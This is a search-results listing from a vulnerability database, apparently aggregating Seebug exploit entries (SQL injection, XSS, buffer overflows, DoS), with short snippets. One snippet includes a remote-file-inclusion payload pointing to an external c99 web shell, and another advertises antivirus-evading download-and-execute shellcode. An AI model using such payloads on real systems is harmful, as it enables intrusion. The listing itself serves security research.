Lucene search
+L
SeebugRecent

56796 matches found

seebug
seebug
•added 2014/07/01 12:0 a.m.•15 views

VU Case Manager Authentication Bypass

No description provided by source. 1-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=0 0 1 1 /' \ /'\ /\ \ /'\ 0 0 /, \ /\/\ \ \ \ \ ,/\ /\ \ 1 1 //\ \ /' \ /\ //\ /'\ \ /\ \ \ \ /'\ 0 0 \ \ /\ /\ \ \ \ /\ \ \ /\ /\ \ \ \ \ \ \ / 1 1 \ \ \ \\ \ \ /\ \...

7.1AI score
Exploits0
seebug
seebug
•added 2014/07/01 12:0 a.m.•23 views

Irix LPD tagprinter - Command Execution

No description provided by source. $Id$ This file is part of the Metasploit Framework and may be subject to redistribution and commercial restrictions. Please see the Metasploit Framework web site for more information on licensing and terms of use. http://metasploit.com/framework/ require...

7.1AI score
Exploits0
seebug
seebug
•added 2014/07/01 12:0 a.m.•26 views

Serva 2.0.0 - HTTP Server GET Remote Denial of Service Vulnerability

No description provided by source. !/usr/bin/python Exploit Title: Serva v2.0.0 HTTP Server GET Remote Denial of Service Vulnerability Version: v2.0.0 Date: 2013-01-14 Author: Julien Ahrens @MrTuxracer Homepage: www.inshell.net Software Link: http://www.vercot.com Tested on: Windows XP SP3...

7.1AI score
Exploits0
seebug
seebug
•added 2014/07/01 12:0 a.m.•18 views

Powies pForum <= 1.29a (editpoll.php) SQL Injection Vulnerability

No description provided by source. ============================================================================================== Powie's PHP Forum = v1.29a editpoll Remote SQL Injection Exploit =============================================================================================== Critic...

7.1AI score
Exploits0
seebug
seebug
•added 2014/07/01 12:0 a.m.•31 views

Libra File Manager 1.18/2.0 'fileadmin.php' Local File Include Vulnerability

No description provided by source. source: http://www.securityfocus.com/bid/31403/info Libra File Manager is prone to a local file-include vulnerability because it fails to properly sanitize user-supplied input. An attacker can exploit this vulnerability using directory-traversal strings to view...

7.1AI score
Exploits0
seebug
seebug
•added 2014/07/01 12:0 a.m.•29 views

PHPFox 3.6.0 (build3) Multiple SQL Injection Vulnerabilities

No description provided by source. ------------------------------------------------------------ PHPFox v3.6.0 build3 Multiple SQL Injection vulnerabilities ------------------------------------------------------------ == Description == - Software link: http://www.phpfox.com - Affected versions:...

7.1AI score
Exploits0
seebug
seebug
•added 2014/07/01 12:0 a.m.•9 views

Oto Galery 1.0 - Multiple SQL Injection Vulnerabilities

No description provided by source...

7.1AI score
Exploits0
seebug
seebug
•added 2014/07/01 12:0 a.m.•12 views

Shape Web Solutions CMS SQL Injection Vulnerability

No description provided by source. Shape Web Solutions CMS SQL Injection Vulnerability Exploit Title: Shape Web Solutions CMS SQL Injection Vulnerability Author: Ashiyane Digital Security Team Date: 03-18-2011 Vendor or Software Link: http://www.shapeweb.com.br/ Version: All version Category::...

7.1AI score
Exploits0
seebug
seebug
•added 2014/07/01 12:0 a.m.•12 views

XChat <= 2.6.7 (win version) Remote Denial of Service Exploit (perl)

No description provided by source. !/usr/bin/perl rewritten because perl is more elegant than php payload taken from original that ratboy submitted use strict; use Net::IRC; my $nick, $server, $port, $channel, $victim = @ARGV; my $irc = new Net::IRC; my $connect = $irc - newconn Nick = $nick,...

7.1AI score
Exploits0
seebug
seebug
•added 2014/07/01 12:0 a.m.•15 views

Microsoft Internet Explorer 5/6 CSSText Bold Font Denial of Service

No description provided by source. source: http://www.securityfocus.com/bid/5027/info A problem with Microsoft Internet Explorer may make it possible to deny service to users of the browser. The problem is in the handling of certain types of stylesheet input. It may be possible to crash IE. When ...

7.1AI score
Exploits0
seebug
seebug
•added 2014/07/01 12:0 a.m.•19 views

IBM AIX 5.2/5.3 FTP Client Local Buffer Overflow Vulnerability

No description provided by source. source: http://www.securityfocus.com/bid/25077/info The IBM AIX FTP application is prone to a local buffer-overflow vulnerability because it fails to properly bounds-check user-supplied data before copying it to an insufficiently sized memory buffer. A...

7.1AI score
Exploits0
seebug
seebug
•added 2014/07/01 12:0 a.m.•17 views

MySQL MaxDB 7.5 WAHTTP Server Remote Denial of Service Vulnerability

No description provided by source. source: http://www.securityfocus.com/bid/11843/info A remote denial of service vulnerability has been reported to affect the MySQL MaxDB WAHTTP server. This issue is due to a failure of the server to handle malformed requests. An attacker may leverage this issue...

7.1AI score
Exploits0
seebug
seebug
•added 2014/07/01 12:0 a.m.•14 views

VLC Media Player <= 1.0.3 RTSP Buffer Overflow PoC (OSX/Linux)

No description provided by source. !/usr/bin/env python VLC Media Player = 1.0.3 RTSP Buffer Overflow PoC OSX/Linux Found By: DrIDE Tested On: OSX 10.6.2 v1.0.3 Tested On: Ubuntu 9 2.6.28-15-generic v0.9.9a Tested On: No Go on Windows header1 = ?xml version=\1.0\ encoding=\UTF-8?\n header1 +=...

7.1AI score
Exploits0
seebug
seebug
•added 2014/07/01 12:0 a.m.•22 views

Wikepage Opus 13 2007.2 - 'wiki' Parameter Cross-Site Scripting Vulnerability

No description provided by source. source: http://www.securityfocus.com/bid/28842/info Wikepage Opus is prone to a cross-site scripting vulnerability because it fails to properly sanitize user-supplied input. An attacker may leverage this issue to execute arbitrary script code in the browser of a...

7.1AI score
Exploits0
seebug
seebug
•added 2014/07/01 12:0 a.m.•12 views

Free Image & File Hosting Upload Vulnerability

No description provided by source...

7.1AI score
Exploits0
seebug
seebug
•added 2014/07/01 12:0 a.m.•14 views

ovidentia 5.6.x/5.8 search.php babInstallPath Parameter Remote File Inclusion

No description provided by source. source: http://www.securityfocus.com/bid/18232/info Ovidentia is prone to multiple remote file-include vulnerabilities because the application fails to properly sanitize user-supplied input. An attacker can exploit these issues to include arbitrary remote files...

7.1AI score
Exploits0
seebug
seebug
•added 2014/07/01 12:0 a.m.•17 views

Picturesolution <= 2.1 - (config.php path) Remote File Inclusion Vuln

No description provided by source. Picturesolution = v2.1 config.php path Remote File Inclusion Vulnerabilities Found By : Mogatil , http://www.hackteach.org/cc/ Posted By : Cold z3ro , http://www.hackteach.org/cc/ Exploit : /install/config.php?path=http://membres.lycos.fr/prirato1/c99.txt? Examp...

7.1AI score
Exploits0
seebug
seebug
•added 2014/07/01 12:0 a.m.•19 views

WAN Emulator 2.3 - Command Execution

No description provided by source. This file is part of the Metasploit Framework and may be subject to redistribution and commercial restrictions. Please see the Metasploit web site for more information on licensing and terms of use. http://metasploit.com/ require 'msf/core' class Metasploit3...

7.1AI score
Exploits0
seebug
seebug
•added 2014/07/01 12:0 a.m.•14 views

m-phorum 0.3 Index.PHP Cross-Site Scripting Vulnerability

No description provided by source. source: http://www.securityfocus.com/bid/25394/info m-phorum is prone to a cross-site scripting vulnerability because the application fails to properly sanitize user-supplied input. An attacker may leverage this issue to execute arbitrary script code in the...

7.1AI score
Exploits0
seebug
seebug
•added 2014/07/01 12:0 a.m.•27 views

TekBase All-in-One 3.1 - Multiple SQL Injection Vulnerabilities

No description provided by source. Author: n3wb0ss Date: 15/06/09 Contact: [email protected] Software: TekBase All-in-One 3.1 Vendor: tekbase.de Example: http://demo.tekbase.de/ Vendor contacted: No Risk: High I found this website on a german board, looking for another script. Looks to me, li...

7.1AI score
Exploits0
seebug
seebug
•added 2014/07/01 12:0 a.m.•22 views

NewLife Blogger <= 3.0 Insecure Cookie Handling / SQL Injection Vuln

No description provided by source. -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-= NewLife Blogger = v3.0 / Insecure Cookie Handling & SQL Injection Vulnerability -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-= $ Program: NewLife...

7.1AI score
Exploits0
seebug
seebug
•added 2014/07/01 12:0 a.m.•27 views

Wordpress Euclid Theme 1.x.x - CSRF Vulnerability

No description provided by source. Title : Wordpress Euclid V1 Themes CSRF File Upload Vulnerability Author : DevilScreaM Date : 11/17/2013 - 17 November 2013 Category : Web Applications Type : PHP Version : 1.x.x Vendor : http://freelancewp.com Download :...

7.1AI score
Exploits0
seebug
seebug
•added 2014/07/01 12:0 a.m.•22 views

Jetik Emlak ESA 2.0 - Multiple Remote SQL Injection Vulnerabilities

No description provided by source. Jetik Emlak ESA 2.0 System Script KayitNo multiple remote sql inj ---------------------------------------------------------- Discovered By: ZoRLu Date: 24.09.2008 contact: [email protected] contact: [email protected] N0T: YALNIZLIK, YiTiRDi ANLAMINI YALNIZLIGIMDA :...

7.1AI score
Exploits0
seebug
seebug
•added 2014/07/01 12:0 a.m.•14 views

IBM AIX <= 4.2.1, Sun Solaris <= 7.0 LC_MESSAGES libc Buffer Overflow Vulnerability (4)

No description provided by source. source: http://www.securityfocus.com/bid/268/info A buffer overflow in libc's handling of the LCMESSAGES environment variable allows a malicious user to exploit any suid root program linked agains libc to obtain root privileges. This problem is found in both IBM...

7.1AI score
Exploits0
seebug
seebug
•added 2014/07/01 12:0 a.m.•21 views

Claroline 1.8.9 phpbb/viewtopic.php URL XSS

No description provided by source. source: http://www.securityfocus.com/bid/30269/info Claroline is prone to multiple input-validation vulnerabilities: 1. Multiple cross-site scripting vulnerabilities. 2. A remote URI-redirection vulnerability. An attacker may leverage these issues to execute...

7.1AI score
Exploits0
seebug
seebug
•added 2014/07/01 12:0 a.m.•20 views

Jetbox CMS 2.1 - Multiple SQL Injection Vulnerabilities

No description provided by source. source: http://www.securityfocus.com/bid/24077/info Jetbox is prone to multiple SQL-injection vulnerabilities because it fails to sufficiently sanitize user-supplied data before using it in an SQL query. Exploiting this issue could allow an attacker to compromis...

7.1AI score
Exploits0
seebug
seebug
•added 2014/07/01 12:0 a.m.•10 views

WebEx GPCContainer Memory Access Violation Multiple Denial of Service Vulnerabilities

No description provided by source. source: http://www.securityfocus.com/bid/26430/info WebEx is prone to multiple remote denial-of-service vulnerabilities. Attackers can exploit these issues to crash applications that use the ActiveX control, denying service to legitimate users. html head script...

7.1AI score
Exploits0
seebug
seebug
•added 2014/07/01 12:0 a.m.•75 views

Dropbear SSH <= 0.34 Remote Root Exploit

No description provided by source. / Linux x86 Dropbear SSH = 0.34 remote root exploit coded by live You'll need a hacked ssh client to try this out. I included a patch to openssh-3.6.p1 somewhere below this comment. The point is: the buffer being exploited is too small25 bytes to hold our...

7.1AI score
Exploits0
seebug
seebug
•added 2014/07/01 12:0 a.m.•15 views

Juniper Networks Secure Access 2000 - 'rdremediate.cgi' Cross Site Scripting Vulnerability

No description provided by source. source: http://www.securityfocus.com/bid/28034/info Juniper Networks Secure Access 2000 is prone to a cross-site scripting vulnerability because it fails to adequately sanitize user-supplied input. An attacker may leverage this issue to execute arbitrary script...

7.1AI score
Exploits0
seebug
seebug
•added 2014/07/01 12:0 a.m.•31 views

SpiderSales 2.0 Shopping Cart Multiple Vulnerabilities

No description provided by source. source: http://www.securityfocus.com/bid/9799/info Multiple vulnerabilities have been identified in the application that may allow an attacker to obtain the private cryptographic key and gain access to sensitive information. The application is also reported pron...

7.1AI score
Exploits0
seebug
seebug
•added 2014/07/01 12:0 a.m.•20 views

FTPshell Server <= 3.38 Remote Denial of Service Exploit

No description provided by source. !/usr/bin/perl Usage: FTPShellFTPDOS.pl ip user pass FTPShellFTPDOS.pl 127.0.0.1 hello moto FTPshell Server Version 3.38 Download: http://www.ftpshell.com/ use IO::Socket; use Win32; use strict; my$i = ; my$socket = ; for $i = 1; $i = 40; $i++ if $socket =...

7.1AI score
Exploits0
seebug
seebug
•added 2014/07/01 12:0 a.m.•23 views

IE9, SharePoint, Lync toStaticHTML HTML Sanitizing Bypass

No description provided by source. toStaticHTML: The Second Encounter CVE-2012-1858 HTML Sanitizing Bypass - CVE-2012-1858http://www.cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-1858 Original advisory -...

4.3CVSS6.4AI score0.22024EPSS
Exploits6
seebug
seebug
•added 2014/07/01 12:0 a.m.•16 views

WordPress SolveMedia 1.1.0 CSRF Vulnerability

No description provided by source. Exploit Title: WordPress SolveMedia 1.1.0 CSRF Vulnerability Release Date: 24/01/13 Author: Junaid Hussain - illSecure Research Group - Contact: [email protected] | Website: http://illSecure.com Software Link:...

7.1AI score
Exploits0
seebug
seebug
•added 2014/07/01 12:0 a.m.•20 views

Microsoft Windows Vista/Server 2008 "nsiproxy.sys" Local Kernel DoS Exploit

No description provided by source. !/usr/bin/python Title: Microsoft Windows Vista/Server 2008 nsiproxy.sys Local Kernel DoS Exploit Author: Lufeng Li of Neusoft Corporation Vendor: www.microsoft.com Vulnerable: Windows Vista/Server 2008 from ctypes import kernel32 = windll.kernel32 Psapi =...

7.1AI score
Exploits0
seebug
seebug
•added 2014/07/01 12:0 a.m.•25 views

Download & Exec polymorphed shellcode Engine

No description provided by source. Download & Exec polymorphed shellcode engine POC This downloading and execution code is not detectable by popular AVs. Greetz 2: DarkEagle and Unl0ck researcherz; Str0ke and milw0rm; HD Moor and metasploit project; Maxus, Fuchunic, YrSam, Garry; Offtopic and PTT...

7.1AI score
Exploits0
seebug
seebug
•added 2014/07/01 12:0 a.m.•27 views

MS IE 5.0 Download Behavior Vulnerability

No description provided by source. Microsoft Internet Explorer 5.0 for Windows 95/Windows 98/Windows NT 4 Download Behavior Vulnerability source: http://www.securityfocus.com/bid/674/info The download behavior feature of Microsoft's Internet Explorer 5 may allow a malicious web site operator to...

7.1AI score
Exploits0
seebug
seebug
•added 2014/07/01 12:0 a.m.•25 views

Wordpress Twitget Plugin 3.3.1 - Multiple Vulnerabilities

No description provided by source. Details ================ Software: Twitget Version: 3.3.1 Homepage: http://wordpress.org/plugins/twitget/ Advisory ID: dxw-1970-435 CVE: CVE-2014-2559 CVSS: 6.4 Medium; AV:N/AC:L/Au:N/C:P/I:P/A:N Description ================ CSRF/XSS vulnerability in Twitget 3.3...

6.8CVSS6.5AI score0.03285EPSS
Exploits6
seebug
seebug
•added 2014/07/01 12:0 a.m.•41 views

Versant Object Database <= 7.0.1.3 Commands Execution Exploit

No description provided by source. Versant server = 7.0.1.3 Arbitrary Commands Execution Exploit Exploit-DB mirror: http://www.exploit-db.com/sploits/2008-versantcmd.zip milw0rm.com 2008-03-04...

7.1AI score
Exploits0
seebug
seebug
•added 2014/07/01 12:0 a.m.•20 views

Microsoft IIS 4.0/5.0 Chunked Encoding Transfer Heap Overflow Vulnerability (2)

No description provided by source. source: http://www.securityfocus.com/bid/4485/info A heap overflow condition in the 'chunked encoding transfer mechanism' related to Active Server Pages has been reported for Microsoft IIS Internet Information Services. This condition affects IIS 4.0 and IIS 5.0...

7.1AI score
Exploits0
seebug
seebug
•added 2014/07/01 12:0 a.m.•18 views

Pirelli Discus DRG A125g - Remote Change SSID Value Vulnerability

No description provided by source...

7.1AI score
Exploits0
seebug
seebug
•added 2014/07/01 12:0 a.m.•16 views

Samba 2.2.x 'call_trans2open' Remote Buffer Overflow Vulnerability (4)

No description provided by source. source: http://www.securityfocus.com/bid/7294/info A buffer overflow vulnerability has been reported for Samba. The problem occurs when copying user-supplied data into a static buffer. By passing excessive data to an affected Samba server, it may be possible for...

7.1AI score
Exploits0
seebug
seebug
•added 2014/07/01 12:0 a.m.•20 views

CPanel 10 DNSlook.HTML Cross-Site Scripting Vulnerability

No description provided by source. source: http://www.securityfocus.com/bid/21142/info Cpanel is prone to a cross-site scripting vulnerability because the application fails to properly sanitize user-supplied input. An attacker may leverage this issue to have arbitrary script code execute in the...

7.1AI score
Exploits0
seebug
seebug
•added 2014/07/01 12:0 a.m.•39 views

Splunk <= 4.3.3 Arbitrary File Read

No description provided by source. Exploit Title: Splunk = 4.3.3 Reading Arbitrary Files Contents Date: 09/03/2012 Exploit Author: Marcio Almeida [email protected] Vendor Homepage: http://www.splunk.com/ Software Link: http://www.splunk.com/download?r=header Version: 4.3.3 and priors...

7.1AI score
Exploits0
seebug
seebug
•added 2014/07/01 12:0 a.m.•21 views

Linux Kernel <= 2.6.9 / <= 2.4.28 - ip_options_get Local Overflow

No description provided by source. / int overflow in ipoptionsget Copyright Georgi Guninski Cannot be used in vulnerability databases like securityfocus and mitre / include unistd.h include stdlib.h include stdio.h include errno.h include ctype.h include string.h include sys/types.h include...

7.1AI score
Exploits0
seebug
seebug
•added 2014/07/01 12:0 a.m.•12 views

Portix-PHP 2-0.3.2 Portal Multiple Cross-Site Scripting Vulnerabilities

No description provided by source. source: http://www.securityfocus.com/bid/18227/info Portix-PHP is prone to multiple cross-site scripting vulnerabilities. These issues are due to a failure in the application to properly sanitize user-supplied input. An attacker may leverage these issues to have...

7.1AI score
Exploits0
seebug
seebug
•added 2014/07/01 12:0 a.m.•35 views

Ultra Mini HTTPD 1.21 - Stack Buffer Overflow

No description provided by source. Exploit Title: Ultra Mini HTTPD stack buffer overflow Date: 10 July 2013 Exploit Author: superkojiman - http://www.techorganic.com Vendor Homepage: http://www.picolix.jp/ Software Link: http://www.vector.co.jp/soft/winnt/net/se275154.html Version: 1.21 Tested on...

7.1AI score
Exploits0
seebug
seebug
•added 2014/07/01 12:0 a.m.•16 views

CPanel <= 11 PassWDMySQL Cross-Site Scripting Vulnerability

No description provided by source. source: http://www.securityfocus.com/bid/22474/info cPanel is prone to a cross-site scripting vulnerability because the application fails to properly sanitize user-supplied input. An attacker may leverage this issue to execute arbitrary script code in the browse...

7.1AI score
Exploits0
seebug
seebug
•added 2014/07/01 12:0 a.m.•39 views

Joomla Component com_biblestudy LFI Vulnerability

No description provided by source. @=======================================@ @=Script : Joomla Component combiblestudy @=Author : FL0RiX @=Greez : Deep-Power ,Pyske,Wretch-x & All Friends @=Bug Type : Local File Inlusion @=Dork : inurl:combiblestudy @=======================================@ @=Vul...

7.1AI score
Exploits0
seebug
seebug
•added 2014/07/01 12:0 a.m.•20 views

Roundcube Webmail 0.1 CSS Expression Input Validation Vulnerability

No description provided by source. source: http://www.securityfocus.com/bid/26800/info Roundcube Webmail is prone to an input-validation vulnerability because it fails to sanitize HTML email messages. Attackers can exploit this issue to execute arbitrary script code in the browser of an...

7.1AI score
Exploits0
seebug
seebug
•added 2014/07/01 12:0 a.m.•31 views

IRIX 5.2/5.3/6.x telnetd Environment Variable Format String Vulnerability

No description provided by source. source: http://www.securityfocus.com/bid/1572/info A vulnerability exists in the telnet daemon shipped with Irix versions 6.2 through 6.5.8, and in patched versions of the telnet daemon in Irix 5.2 through 6.1, from Silicon Graphics SGI. The telnetd will blindly...

7.1AI score
Exploits0
Total number of security vulnerabilities56796